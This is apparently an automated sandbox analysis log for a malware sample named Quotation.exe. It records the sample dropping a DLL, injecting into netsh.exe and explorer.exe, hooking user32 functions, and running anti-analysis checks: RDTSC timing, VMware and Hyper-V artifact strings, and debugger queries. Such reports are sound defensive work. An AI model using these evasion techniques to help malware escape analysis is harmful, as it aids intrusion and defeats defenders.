          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C4D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_0041E34F push eax; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00417CCE push 7FCF5E29h; iretd
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00417CD7 push ebx; retf
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBE34F push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCF0B push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCF02 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBCF6C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB64B4 push esi; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB7CD7 push ebx; retf
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB7CCE push 7FCF5E29h; iretd
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB7D58 push esp; iretd
          Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE2
          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002BA98E4 second address: 0000000002BA98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002BA9B5E second address: 0000000002BA9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quotation.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4628Thread sleep count: 36 > 30
          Source: C:\Windows\explorer.exe TID: 4628Thread sleep time: -72000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 6920Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.256958737.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.251839029.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.256958737.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.503632990.0000000003755000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000002.503632990.0000000003755000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.242063875.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.257013480.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.251856943.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.257013480.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.256579128.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Quotation.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Quotation.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73CA1000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_023D166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_023D1886 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C8C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C1746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C76DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF2D8A mov eax, dword ptr fs:[00000030h]
